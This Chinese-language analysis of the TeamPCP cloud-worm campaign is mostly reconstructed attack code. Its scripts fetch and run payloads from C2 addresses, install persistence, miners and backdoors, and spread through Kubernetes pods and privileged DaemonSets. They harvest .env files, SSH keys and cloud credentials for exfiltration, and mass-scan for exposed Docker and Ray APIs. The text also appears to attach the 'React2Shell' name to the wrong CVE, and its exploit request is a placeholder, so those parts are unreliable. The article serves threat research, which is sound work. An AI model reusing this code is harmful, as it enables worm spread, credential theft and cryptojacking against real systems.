TeamPCP 黑客团伙利用一系列自动化脚本,实现了从入侵、控制到扩散的完整攻击链。其攻击过程通常分为五个阶段:攻击准备、入口突破、加载首个恶意脚本、黑产服务安装以及最后的自动扩散。
为了提高隐蔽性并防止溯源,攻击者主要采取以下措施:
- 利用 Telegram 群组频道进行动态发布、私聊指挥以及买卖窃取的数据或访问权限。
- 利用 TOR (洋葱) 网络隐藏真实的服务器位置,用于托管 C2 面板和 Sliver 恶意软件下载页面,以降低被溯源和封禁的风险。
攻击团伙维护了两台 Sliver C2 下载服务器。攻击链通常从配置不当的 Docker 容器切入,通过自动扫描暴露的 Alpine 容器作为首个立足点。入侵成功后,会在目标容器内部署并执行核心脚本 proxy.sh。该脚本会进一步部署加密货币挖矿程序、安装持久化系统服务、后门,并从下载服务器拉取另外 4 个功能脚本,实现数据窃取和自动扩散。整个攻击架构如下图所示:

proxy.sh 脚本功能
proxy.sh 脚本作为主控脚本,执行后会同时开展多项工作,包括:在宿主机或容器内注册系统服务,实现持久化或更深层的控制;部署加密货币挖矿程序,利用被控环境的算力进行挖矿;部署后门(如 frps、gost、sliver),便于攻击者后续再次接入和控制;从两台服务器 (67.217.57.240、44.252.85.168) 下载并投放次级脚本。
这些次级脚本文件包括:
kube.sh 或 kube.py: 用于 Kubernetes 环境横向移动。
react.py: 针对 React/Next.js 应用的利用与数据窃取。
pcpcat.py 或 teampcp.py: 用于扫描与部署。
redis-deploy.py: 针对 Redis 的利用。
scanner.py: 用于发现新目标。
proxy.sh 的核心内容如下:
#!/bin/sh
# =============================================================================
# proxy.sh - TeamPCP 攻击链主控脚本
# 功能:① 安装系统服务 ② 部署加密货币挖矿程序 ③ 部署后门 ④ 从下载服务器拉取并投放脚本
# =============================================================================
# 两台下载服务器(图中与报告一致)
SRV1="http://67.217.57.240:666"
SRV2="http://44.252.85.168:666"
FILES="${SRV2}/files"
# 工作目录:宿主机或容器内可写路径
dir="${dir:-/tmp/teampcp}"
mkdir -p "$dir" 2>/dev/null
# ---------- ④ 从下载服务器拉取并投放脚本(先拉取,后续会用到) ----------
# 图中:从 67.217.57.240、44.252.85.168 下载并投放到当前环境
fetchScript() {
_url="$1"
_name="$2"
curl -fsSL "$_url" -o "${dir}/${_name}" 2>/dev/null && chmod +x "${dir}/${_name}" 2>/dev/null
}
fetchScript "${FILES}/kube.py" "kube.py"
fetchScript "${FILES}/react.py" "react.py"
fetchScript "${FILES}/teampcp.py" "teampcp.py"
fetchScript "${FILES}/pcpcat.py" "pcpcat.py"
fetchScript "${FILES}/redis-deploy.py" "redis-deploy.py"
fetchScript "${FILES}/scanner.py" "scanner.py"
# ---------- ① 安装系统服务(宿主机或容器内注册,实现持久化或更深层控制) ----------
installSystemServices() {
if [ ! -d /etc/systemd/system ]; then
return
fi
# 1) PCPcat React 扫描器服务
cat > /etc/systemd/system/teampcp-react.service << SVCEOF
[Unit]
Description=PCPcat React Scanner
After=network.target
[Service]
Type=simple
WorkingDirectory=${dir}
ExecStart=/usr/bin/python3 ${dir}/react.py
Restart=always
RestartSec=60
[Install]
WantedBy=multi-user.target
SVCEOF
systemctl daemon-reload 2>/dev/null
systemctl enable teampcp-react.service 2>/dev/null
systemctl start teampcp-react.service 2>/dev/null
if [ -f "${dir}/scanner.py" ]; then
cat > /etc/systemd/system/teampcp-scanner.service << SVCEOF2
[Unit]
Description=PCPcat Scanner
After=network.target
[Service]
Type=simple
WorkingDirectory=${dir}
ExecStart=/usr/bin/python3 ${dir}/scanner.py
Restart=always
RestartSec=120
[Install]
WantedBy=multi-user.target
SVCEOF2
systemctl daemon-reload 2>/dev/null
systemctl enable teampcp-scanner.service 2>/dev/null
systemctl start teampcp-scanner.service 2>/dev/null
fi
}
installSystemServices
# ---------- ② 部署加密货币挖矿程序(利用被控环境算力进行挖矿) ----------
deployCryptominer() {
_url="${FILES}/BORING_SYSTEM"
_out="${dir}/BORING_SYSTEM"
curl -fsSL "$_url" -o "$_out" 2>/dev/null || true
if [ -f "$_out" ]; then
chmod +x "$_out" 2>/dev/null
( "$_out" & ) 2>/dev/null
fi
_miner_url="${FILES}/mine.sh"
_miner_out="${dir}/mine.sh"
curl -fsSL "$_miner_url" -o "$_miner_out" 2>/dev/null || true
if [ -f "$_miner_out" ]; then
chmod +x "$_miner_out" 2>/dev/null
( sh "$_miner_out" & ) 2>/dev/null
fi
}
deployCryptominer
# ---------- ③ 部署后门(便于攻击者后续再次接入与控制) ----------
deployBackdoor() {
for _base in "$SRV1" "$SRV2"; do
_frps="${_base}/files/frps"
_gost="${_base}/files/gost"
_sliver="${_base}/files/sliver"
for _url in "$_frps" "$_gost" "$_sliver"; do
_name=$(basename "$_url")
_path="${dir}/${_name}"
curl -fsSL "$_url" -o "$_path" 2>/dev/null && chmod +x "$_path" 2>/dev/null && ( "$_path" & ) 2>/dev/null
done
done
}
deployBackdoor
# ---------- K8s 环境检测:若在集群内则拉取并执行 kube.py(横向移动) ----------
if [ -f /var/run/secrets/kubernetes.io/serviceaccount/token ]; then
fetchScript "${FILES}/kube.py" "k8s.py"
[ -f "${dir}/k8s.py" ] && python3 "${dir}/k8s.py" 2>/dev/null &
fi
# ---------- ④ 续:拉取脚本后,在后台启动扫描/发现类脚本(发现新目标) ----------
[ -f "${dir}/teampcp.py" ] && ( python3 "${dir}/teampcp.py" & ) 2>/dev/null
[ -f "${dir}/pcpcat.py" ] && ( python3 "${dir}/pcpcat.py" & ) 2>/dev/null
[ -f "${dir}/redis-deploy.py" ] && ( python3 "${dir}/redis-deploy.py" & ) 2>/dev/null
kube.py 脚本功能
kube.py 脚本的作用是,当 proxy.sh 检测到当前处于 K8s 环境时,将其拉取并执行,实现在集群内的横向移动与持久化。其行为包括:
- 利用集群内的
serviceaccount 等凭据,通过 K8s API 枚举 namespace、pod 等资源。
- 对每个
pod 调用 exec 接口,在容器内执行 curl -fsSL <PROXY_URL> | bash 命令(即再次拉取并执行 proxy.sh),从而将整个集群变成一个可自我扩散的“扫描/代理网络”。
- 在集群中部署 DaemonSet(例如命名为
system-monitor,放在 kube-system 命名空间),实现持久化与宿主机级别的控制。
该脚本的核心内容如下:
# -*- coding: utf-8 -*-
# =============================================================================
# kube.py - TeamPCP K8s 集群内横向移动与持久化
# =============================================================================
import urllib.request
import ssl
PROXY_URL = "http://44.252.85.168:666/files/proxy.sh"
def spread_to_pods():
"""对每个 pod 调用 exec,在容器内执行 curl proxy.sh | bash"""
for pod in pods:
try:
pod_name = pod['metadata']['name']
namespace = pod['metadata']['namespace']
exec_url = f"{api_url}/api/v1/namespaces/{namespace}/pods/{pod_name}/exec"
exec_url += f"?command=sh&command=-c&command=curl+-fsSL+{PROXY_URL}+|+bash"
exec_url += "&stdout=true&stderr=true"
req = urllib.request.Request(exec_url, method='POST')
with urllib.request.urlopen(req, context=ctx, timeout=30) as resp:
pass
continue
except Exception as e:
continue
# ---- DaemonSet:在每节点部署特权Pod,挂载宿主机并再次拉取proxy.sh ----
daemonset = {
"apiVersion": "apps/v1",
"kind": "DaemonSet",
"metadata": {
"name": "system-monitor",
"namespace": "kube-system"
},
"spec": {
"selector": {
"matchLabels": {
"app": "system-monitor"
}
},
"template": {
"metadata": {
"labels": {
"app": "system-monitor"
}
},
"spec": {
"hostNetwork": True,
"hostPID": True,
"containers": [
{
"name": "monitor",
"image": "alpine:latest",
"command": [
"sh",
"-c",
"apk add curl bash python3 >/dev/null 2>&1; "
"curl -fsSL " + PROXY_URL + " | bash; "
"sleep infinity"
],
"securityContext": {
"privileged": True
},
"volumeMounts": [
{
"name": "host",
"mountPath": "/host"
}
]
}
],
"volumes": [
{
"name": "host",
"hostPath": {
"path": "/"
}
}
]
}
}
}
}
react.py 脚本功能
react.py 脚本专门针对存在 CVE-2025-29927(即 React2Shell 漏洞)的 React/Next.js 应用,实现远程命令执行、窃取敏感数据并投递下一阶段载荷。具体行为包括:
- 从攻击者控制的 API 拉取目标域名列表。
- 构造特制的 Next.js 请求(如
multipart 表单与框架相关头部),触发服务端命令执行,并通过重定向元数据等方式取回命令输出。
- 执行成功后,在目标主机上运行一系列命令以收集信息,包括:环境变量、
.env 类配置文件、Git 凭据、多用户 SSH 密钥、云厂商凭据以及基础主机信息等,并将窃取的数据回传到控制 API。
- 数据窃取完成后,尝试投递二级载荷:根据目标操作系统,通过
apk/apt/yum/curl/wget/python 等方式下载并执行远程脚本,用于建立持久化或代理。
其还原后的脚本内容如下:
# -*- coding: utf-8 -*-
# 功能摘要:
# - 从中心 API 拉取目标域名,利用 CVE-2025-29927 实现远程命令执行
# - 通过特制 Next.js 请求(multipart + 框架头)触发服务端执行,经重定向元数据取回输出
# - 窃取 .env、环境变量、Git 凭据、SSH 密钥、云凭据、主机信息并回传至同一控制 API
# - 成功后按目标 OS(apk/apt/yum)下载并执行远程脚本,建立持久化或代理
# =============================================================================
import urllib.request
import urllib.error
import ssl
import json
import re
# control_host 可能同时提供:目标列表、回传接收、二级载荷
CONTROL_BASE = "http://44.252.85.168:666"
TARGETS_API = f"{CONTROL_BASE}/api/targets" # 拉取目标域名列表
EXFIL_API = f"{CONTROL_BASE}/api/exfil" # 回传窃取数据
PAYLOAD_URL = f"{CONTROL_BASE}/files/proxy.sh" # 二级载荷,用于持久化或代理
# 忽略 SSL 校验证书
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
def getTargets():
# getTargets - 从中心 API 拉取待攻击域名列表
try:
req = urllib.request.Request(TARGETS_API)
with urllib.request.urlopen(req, context=ctx, timeout=30) as resp:
data = resp.read().decode("utf-8", errors="ignore")
# 假定返回 JSON 数组或每行一域名的文本
try:
return json.loads(data)
except json.JSONDecodeError:
return [line.strip() for line in data.splitlines() if line.strip()]
except Exception:
return []
def runRemoteCmd(domain, cmd, baseUrl=None):
# runRemoteCmd - 在目标域名上通过 React2Shell 执行命令并取回输出
# 参数: domain 目标域名, cmd 要执行的 shell 命令, baseUrl 可选(如 https://domain.com)
# 返回: 命令输出文本,失败返回 None
baseUrl = baseUrl or ("https://" + domain if not domain.startswith("http") else domain)
# CVE-2025-29927(React2Shell):构造特制 Next.js 请求
# 报告中:multipart form data + framework-specific headers,触发服务端执行,经 redirect 元数据取回输出
# 真实漏洞端点、表单字段名及输出回传方式未公开,以下为依描述还原的合理结构
url = baseUrl.rstrip("/") + "/api/route" # 占位;实际路径依 Next.js 与漏洞端点而定
payload = (
b'------WebKitFormBoundary\r\n'
b'Content-Disposition: form-data; name="field"; filename="x"\r\n\r\n'
+ cmd.encode("utf-8") + b'\r\n------WebKitFormBoundary--'
)
req = urllib.request.Request(
url,
data=payload,
method="POST",
headers={
"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundary",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
},
)
try:
with urllib.request.urlopen(req, context=ctx, timeout=15) as resp:
# 若输出在响应体则直接读;若在 Location 或自定义头则需解析
body = resp.read().decode("utf-8", errors="ignore")
# 尝试从重定向或响应中提取输出(示例:可能编码在 Location 或 JSON 中)
match = re.search(r"output=([^&\s]+)", body) or re.search(r'"output"\s*:\s*"([^"]*)"', body)
if match:
return urllib.request.unquote(match.group(1))
return body[:8192] if body else None
except urllib.error.HTTPError as e:
# 部分利用链可能通过错误页或 302 携带输出
if e.code == 302 and e.headers.get("Location"):
return e.headers.get("Location", "")
return e.read().decode("utf-8", errors="ignore")[:8192] if e.fp else None
except Exception:
return None
def getHarvestCommands():
# getHarvestCommands - 返回用于窃取敏感数据的命令列表(每条在目标上执行后取回输出)
return [
"cat .env .env.local .env.* 2>/dev/null",
"printenv",
"git config --list 2>/dev/null",
"cat /root/.ssh/id_rsa /root/.ssh/id_ed25519 /home/*/.ssh/id_rsa /home/*/.ssh/id_ed25519 2>/dev/null",
"cat /root/.aws/credentials /home/*/.aws/credentials 2>/dev/null",
"cat /root/.config/gcloud/credentials.json /home/*/.config/gcloud/*.json 2>/dev/null",
"hostname; uname -a; id; whoami",
]
def harvestAndExfil(domain, runCmd):
# harvestAndExfil - 在已取得 RCE 的目标上执行窃取命令,并将结果回传至控制 API
# 参数: domain 当前目标域名, runCmd 可调用 runRemoteCmd(domain, cmd) 的函数
results = {"domain": domain, "harvest": {}}
for i, cmd in enumerate(getHarvestCommands()):
out = runCmd(cmd)
if out:
results["harvest"]["cmd_%d" % i] = out[:65535]
if not results["harvest"]:
return
try:
data = json.dumps(results).encode("utf-8")
req = urllib.request.Request(
EXFIL_API,
data=data,
method="POST",
headers={"Content-Type": "application/json"},
)
urllib.request.urlopen(req, context=ctx, timeout=30)
except Exception:
pass
def deploySecondary(domain, runCmd):
# deploySecondary - 在目标上下载并执行远程脚本,建立持久化或访问代理
# 报告中:通过 apk/apt/yum/curl/wget/python 等按 OS 选择方式下载执行
bootstrap = (
"apk add --no-cache curl 2>/dev/null || apt-get install -y curl 2>/dev/null || yum install -y curl 2>/dev/null; "
"curl -fsSL '%s' | sh 2>/dev/null || wget -qO- '%s' | sh 2>/dev/null || python3 -c \"import urllib.request; exec(urllib.request.urlopen('%s').read().decode())\" 2>/dev/null"
) % (PAYLOAD_URL, PAYLOAD_URL, PAYLOAD_URL)
runCmd(bootstrap)
def main():
# main - 主流程:拉取目标 → 利用 React2Shell 执行命令 → 窃取并回传 → 投递二级载荷
targets = getTargets()
for domain in targets:
if not domain:
continue
# 探测是否可利用:执行 id 或 echo
out = runRemoteCmd(domain, "id")
if not out:
out = runRemoteCmd(domain, "echo 1")
if out:
harvestAndExfil(domain, lambda cmd: runRemoteCmd(domain, cmd))
deploySecondary(domain, lambda cmd: runRemoteCmd(domain, cmd))
if __name__ == "__main__":
main()
以下是 TeamPCP 在攻击中实际窃取到的部分数据截图示例:

pcpcat.py 脚本功能
pcpcat.py 脚本的主要作用是在互联网上进行大规模扫描,发现暴露的 Docker API 和 Ray 管理界面,并自动部署恶意容器或 Ray 任务,实现类似“云蠕虫”的扩散。其行为包括:
- 从公网或 GitHub(例如 DeadCatx3 的仓库)等来源拉取大量的 CIDR 地址块,对大量 IP 地址进行并行扫描(主要针对常见的 Docker、Ray 端口)。
- 校验发现的端点是否真的可以被利用(例如未授权的管理 API),然后通过 API 远程创建恶意负载。
- 针对 Docker:拉取
Alpine 镜像,启动具有 宿主机网络模式 和 自动重启 策略的容器,并在容器内拉取并执行远程脚本(与 proxy.sh 的拉取命令一致)。
- 针对 Ray:向 Ray dashboard 提交任务,执行经过 base64 编码的引导载荷(可能包含挖矿等恶意行为)。
其参考代码如下:
# -*- coding: utf-8 -*-
# =============================================================================
# pcpcat.py - TeamPCP 大流量互联网扫描与部署:发现暴露的 Docker API / Ray,并自动部署恶意容器或任务
# 根据“Analysis of pcpcat.py”功能描述还原:大规模发现、自动校验、无交互部署、重启策略持久化
# =============================================================================
# 设计:云蠕虫式——将配置不当的编排端点转化为分布式立足点,无需凭据,仅利用暴露的管理接口
# =============================================================================
import urllib.request
import urllib.error
import ssl
import json
import socket
import ipaddress
import base64
import concurrent.futures
# 拉取并执行 proxy.sh 的地址(与 proxy.sh、scanner 一致)
PROXY_SCRIPT_URL = "http://67.217.57.240:666/files/proxy.sh"
PROXY_SCRIPT_URL_ALT = "http://44.252.85.168:666/files/proxy.sh"
# 公网 CIDR 来源(图中:从 public provider lists 获取大量 CIDR)
# 示例:云厂商公布的 IP 段或 DeadCatx3 等列表
CIDR_SOURCES = [
"https://raw.githubusercontent.com/DeadCatx3/cidr/main/cidr.txt",
# 可扩展:AWS/GCP/Azure 等 IP 范围 JSON
]
FALLBACK_CIDRS = ["0.0.0.0/0"]
# Docker / Ray 常见端口
DOCKER_PORTS = [2375, 2376]
RAY_PORTS = [8265, 6379]
# 并行扫描线程数
MAX_WORKERS = 64
CONNECT_TIMEOUT = 2
API_TIMEOUT = 5
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
def get_docker_startup_script():
"""返回在容器内拉取并执行 proxy.sh 的 shell 脚本(与野外样本一致)。"""
return f'''/bin/sh
echo "https://t.me/Persy_PCP was here
https://t.me/teampcp"
apk add --no-cache curl bash python3 >/dev/null 2>&1
curl -fsSL "{PROXY_SCRIPT_URL}" | bash
'''
def deploy_to_docker(ip, port):
"""
对暴露的 Docker API (ip:port) 部署恶意容器。
行为:拉取 Alpine 镜像,启动宿主机网络、自动重启的容器,容器内拉取并执行远程脚本(proxy.sh)。
"""
endpoint = f"{ip}:{port}"
base_url = f"http://{ip}:{port}"
script = get_docker_startup_script().strip().replace("\n", " ")
body = {
"Image": "alpine:latest",
"Cmd": ["/bin/sh", "-c", script],
"HostConfig": {
"NetworkMode": "host",
"RestartPolicy": {"Name": "always"},
},
}
try:
req = urllib.request.Request(
f"{base_url}/containers/create",
data=json.dumps(body).encode(),
method="POST",
headers={"Content-Type": "application/json"},
)
with urllib.request.urlopen(req, context=ctx, timeout=API_TIMEOUT) as resp:
create_res = json.loads(resp.read().decode())
cid = create_res.get("Id")
if not cid:
return False
start_req = urllib.request.Request(
f"{base_url}/containers/{cid}/start",
data=b"",
method="POST",
)
urllib.request.urlopen(start_req, context=ctx, timeout=API_TIMEOUT)
return True
except Exception:
return False
def get_ray_bootstrap_b64():
"""返回 Ray 任务中执行的 base64 引导载荷"""
# 占位:解码后可为拉取 proxy.sh 或挖矿脚本;真实样本中为完整编码
script = "import urllib.request, ssl; ctx=ssl.create_default_context(); ctx.check_hostname=False; ctx.verify_mode=0; exec(urllib.request.urlopen('" + PROXY_SCRIPT_URL + "', context=ctx).read().decode())"
return base64.b64encode(script.encode()).decode()
def deploy_to_ray(ip, port):
"""
向 Ray dashboard 提交任务,执行 base64 编码的引导载荷。
Ray 常见 API:POST /api/jobs 或 /api/serve/applications 等,此处为占位路径。
"""
base_url = f"http://{ip}:{port}"
bootstrap_b64 = get_ray_bootstrap_b64()
# Ray 1.x / 2.x 提交 job 的请求体格式因版本而异,此处为合理推测
body = {
"entrypoint": f"python3 -c \"import base64; exec(base64.b64decode('{bootstrap_b64}').decode())\"",
"runtime_env": {},
}
try:
for path in ["/api/jobs", "/api/version", "/"]:
req = urllib.request.Request(
f"{base_url}{path}",
data=json.dumps(body).encode(),
method="POST",
headers={"Content-Type": "application/json"},
)
try:
with urllib.request.urlopen(req, context=ctx, timeout=API_TIMEOUT) as resp:
if resp.getcode() in (200, 201, 202):
return True
except urllib.error.HTTPError as e:
if e.code in (200, 201, 202):
return True
except Exception:
pass
return False
def fetch_cidr_blocks():
"""从公网 provider 列表获取大量 CIDR(图中:acquires massive CIDR blocks from public provider lists)。"""
all_cidrs = []
for url in CIDR_SOURCES:
try:
req = urllib.request.Request(url)
with urllib.request.urlopen(req, context=ctx, timeout=15) as resp:
text = resp.read().decode("utf-8", errors="ignore")
for line in text.splitlines():
line = line.strip()
if line and not line.startswith("#"):
all_cidrs.append(line)
except Exception:
continue
return all_cidrs if all_cidrs else FALLBACK_CIDRS
def expand_cidr(cidr, limit=2048):
"""将 CIDR 展开为 IP 列表,限制数量以控制扫描规模。"""
try:
net = ipaddress.ip_network(cidr, strict=False)
return [str(ip) for ip in list(net.hosts())[:limit]]
except Exception:
return []
def check_port(ip, port):
"""检测 ip:port 是否开放。"""
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(CONNECT_TIMEOUT)
r = s.connect_ex((ip, port))
s.close()
return r == 0
except Exception:
return False
def verify_docker(ip, port):
"""校验是否为可滥用的未授权 Docker API。"""
try:
req = urllib.request.Request(f"http://{ip}:{port}/version")
with urllib.request.urlopen(req, context=ctx, timeout=API_TIMEOUT) as resp:
return resp.getcode() == 200
except Exception:
return False
def verify_ray(ip, port):
"""校验是否为可用的 Ray dashboard / API。"""
try:
req = urllib.request.Request(f"http://{ip}:{port}/")
with urllib.request.urlopen(req, context=ctx, timeout=API_TIMEOUT) as resp:
return resp.getcode() in (200, 401, 403)
except Exception:
return False
def scan_one(args):
"""单任务:对 (ip, port, kind) 做端口与 API 校验,返回可攻击目标。"""
ip, port, kind = args
if not check_port(ip, port):
return None
if kind == "docker" and verify_docker(ip, port):
return (ip, port, "docker")
if kind == "ray" and verify_ray(ip, port):
return (ip, port, "ray")
return None
def main():
# 1) 大规模发现:获取 CIDR,展开为大量 IP,并行扫描 Docker / Ray 端口
cidrs = fetch_cidr_blocks()
tasks = []
for cidr in cidrs:
for ip in expand_cidr(cidr):
for port in DOCKER_PORTS:
tasks.append((ip, port, "docker"))
for port in RAY_PORTS:
tasks.append((ip, port, "ray"))
found = []
with concurrent.futures.ThreadPoolExecutor(max_workers=MAX_WORKERS) as ex:
for res in concurrent.futures.as_completed([ex.submit(scan_one, t) for t in tasks]):
try:
r = res.result()
if r:
found.append(r)
except Exception:
pass
# 2) 无交互部署:对每个验证通过的目标调用对应部署逻辑,持久化依赖 restart policy(Docker)/ job(Ray)
for ip, port, kind in found:
if kind == "docker":
deploy_to_docker(ip, port)
elif kind == "ray":
deploy_to_ray(ip, port)
if __name__ == "__main__":
main()
scanner.py 脚本功能
scanner.py 脚本主要用于发现互联网上配置不当的 Docker API 与 Ray dashboard,并可选择部署恶意负载或挖矿程序。其行为包括:
- 从 GitHub 账号 DeadCatx3 等处下载 CIDR 列表,用于定义扫描的目标网段。
- 包含与
pcpcat.py 类似的 Docker 部署逻辑:生成拉取并执行 proxy.sh 的启动脚本(与野外容器内执行的命令一致),并对指定的 ip:port 进行部署。
- “boring” 服务器选项:如果启用,则会投递经过 base64 编码的引导脚本;解码后为挖矿相关程序(如 XMRig)。
以下是脚本的部分参考代码:
# -*- coding: utf-8 -*-
# =============================================================================
# scanner.py - TeamPCP 扫描器:发现配置不当的 Docker API 与 Ray dashboard,并部署 proxy 或挖矿
# =============================================================================
import urllib.request
import urllib.error
import ssl
import json
import socket
import ipaddress
import threading
import base64
# 下载服务器(与 proxy.sh 一致)
PROXY_SCRIPT_URL = "http://67.217.57.240:666/files/proxy.sh"
# 备用
PROXY_SCRIPT_URL_ALT = "http://44.252.85.168:666/files/proxy.sh"
# DeadCatx3 GitHub:CIDR 列表(报告中未给出具体 repo 路径,此处为占位)
CIDR_LIST_URL = "https://raw.githubusercontent.com/DeadCatx3/cidr/main/cidr.txt"
# 若 GitHub 不可用,可使用内置或其它源
FALLBACK_CIDRS = ["0.0.0.0/0"]
# Docker / Ray 常见暴露端口
DOCKER_PORTS = [2375, 2376]
RAY_PORTS = [8265, 6379]
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
# -----------------------------------------------------------------------------
# mine.sh 配置与用法(图中:XMRig 安装脚本)
# mine.sh 用法:./miner | ./miner uninstall | ./miner status | ./miner logs | ./miner run | --help | --version
# -----------------------------------------------------------------------------
MINE_CONFIG = {
"WALLET_ADDRESS": "87ttvHnjsno56u3zJV26E6cu6Cfro8ASBSpmAzi6FzGp603KXsoB2r8aR2k82Pmg2SLWHtHCKjrHeHUcZUneqEBFRnkbaz5",
"WORKER_NAME": "${WORKER_NAME:-$(hostname)}",
"POOL_URL": "pool.supportxmr.com:443",
"XMRIG_VERSION": "6.25.0",
"CPU_PERCENT": "${CPU_PERCENT:-60}",
"BINARY_NAME": "miner",
}
def get_docker_startup_script():
"""返回在 Docker 容器内拉取并执行 proxy.sh 的启动脚本(与野外样本一致)。"""
return f'''/bin/sh
echo "https://t.me/Persy_PCP was here
https://t.me/teampcp"
apk add --no-cache curl bash python3 >/dev/null 2>&1
curl -fsSL "{PROXY_SCRIPT_URL}" | bash
'''
def deploy_to_docker(ip, port, use_boring=False):
"""
对暴露的 Docker API (ip:port) 部署恶意容器。
use_boring=True 时部署挖矿引导(base64 xmrig)而非 proxy.sh。
"""
endpoint = f"{ip}:{port}"
base_url = f"http://{ip}:{port}"
if use_boring:
# “boring” 服务器选项:投递 base64 编码的挖矿引导
# 解码后执行会写入 /tmp/miner.b64 → base64 -d → chmod +x /tmp/miner → 执行
bootstrap_b64 = get_bootstrap_b64_miner()
cmd = ["/bin/sh", "-c", f"python3 -c \"import base64; exec(base64.b64decode('{bootstrap_b64}').decode())\""]
else:
script = get_docker_startup_script().strip().replace("\n", " ")
cmd = ["/bin/sh", "-c", script]
body = {
"Image": "alpine:latest",
"Cmd": cmd,
"HostConfig": {
"NetworkMode": "host",
"RestartPolicy": {"Name": "always"},
},
}
try:
req = urllib.request.Request(
f"{base_url}/containers/create",
data=json.dumps(body).encode(),
method="POST",
headers={"Content-Type": "application/json"},
)
with urllib.request.urlopen(req, context=ctx, timeout=10) as resp:
create_res = json.loads(resp.read().decode())
cid = create_res.get("Id")
if not cid:
return False
start_req = urllib.request.Request(
f"{base_url}/containers/{cid}/start",
data=b"",
method="POST",
)
urllib.request.urlopen(start_req, context=ctx, timeout=5)
return True
except Exception:
return False
def get_bootstrap_b64_miner():
"""
返回“挖矿引导”的 base64 字符串
此处返回占位或从远程拉取的b64,真实样本中为完整编码的引导脚本。
"""
# 占位:一段仅写 /tmp/miner.b64 并解码执行的最小示例
bootstrap_script = """
import base64, subprocess, os
p = os.environ.get('MINER_B64', '')
if p:
open('/tmp/miner.b64', 'wb').write(base64.b64decode(p))
subprocess.run(['sh', '-c', 'base64 -d /tmp/miner.b64 > /tmp/miner && chmod +x /tmp/miner && rm -f /tmp/miner.b64 && /tmp/miner'], check=False)
"""
return base64.b64encode(bootstrap_script.encode()).decode()
def fetch_cidr_list():
"""从 GitHub DeadCatx3 拉取 CIDR 列表;失败则返回备用网段。"""
try:
req = urllib.request.Request(CIDR_LIST_URL)
with urllib.request.urlopen(req, context=ctx, timeout=15) as resp:
text = resp.read().decode("utf-8", errors="ignore")
return [line.strip() for line in text.splitlines() if line.strip()]
except Exception:
return FALLBACK_CIDRS
def expand_cidr(cidr):
"""将单个 CIDR 展开为 IP 列表(示例中可限制数量以控制扫描规模)。"""
try:
net = ipaddress.ip_network(cidr, strict=False)
return [str(ip) for ip in net.hosts()][:1024]
except Exception:
return []
def check_port(ip, port, timeout=2):
"""检测 ip:port 是否开放。"""
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(timeout)
r = s.connect_ex((ip, port))
s.close()
return r == 0
except Exception:
return False
def check_docker_api(ip, port):
"""检测是否为未授权 Docker API(简单 GET /version)。"""
try:
req = urllib.request.Request(f"http://{ip}:{port}/version")
with urllib.request.urlopen(req, context=ctx, timeout=5) as resp:
return resp.getcode() == 200
except Exception:
return False
def check_ray_dashboard(ip, port):
"""检测是否为 Ray dashboard(简单 GET)。"""
try:
req = urllib.request.Request(f"http://{ip}:{port}/")
with urllib.request.urlopen(req, context=ctx, timeout=5) as resp:
return resp.getcode() in (200, 401, 403)
except Exception:
return False
def scan_and_deploy(use_boring=False):
"""
主流程:拉取 CIDR → 扫描 Docker / Ray 端口 → 对可用目标执行 deploy_to_docker(或 Ray)。
use_boring=True 时对 Docker 目标部署挖矿引导(base64 xmrig),否则部署 proxy.sh。
"""
cidrs = fetch_cidr_list()
found = []
for cidr in cidrs:
for ip in expand_cidr(cidr):
for port in DOCKER_PORTS:
if check_port(ip, port) and check_docker_api(ip, port):
found.append((ip, port, "docker"))
for port in RAY_PORTS:
if check_port(ip, port):
found.append((ip, port, "ray"))
for ip, port, kind in found:
if kind == "docker":
deploy_to_docker(ip, port, use_boring=use_boring)
def main():
import sys
use_boring = "--boring" in sys.argv
scan_and_deploy(use_boring=use_boring)
if __name__ == "__main__":
main()
总结与思考
TeamPCP 的攻击流程展示了现代自动化攻击的复杂性和危害性。攻击者通过组合利用配置不当的云原生组件(如 Docker、Kubernetes)、已知应用漏洞(如 React2Shell)以及公开的扫描列表,构建了一个高效且隐蔽的攻击自动化体系。这起事件再次提醒我们,云环境下的 安全 配置和持续监控至关重要。
对于广大开发者和运维人员而言,除了及时修复已知漏洞外,更应重视最小权限原则,避免将管理接口(如 Docker Daemon、K8s API Server、Ray Dashboard)直接暴露在公网,并实施严格的网络访问控制。定期审查系统日志和异常进程,也是及早发现此类入侵行为的关键。想要了解更多关于 云原生 安全实践和攻防技术的深度分析,欢迎持续关注 云栈社区 的相关内容分享。
(全文完)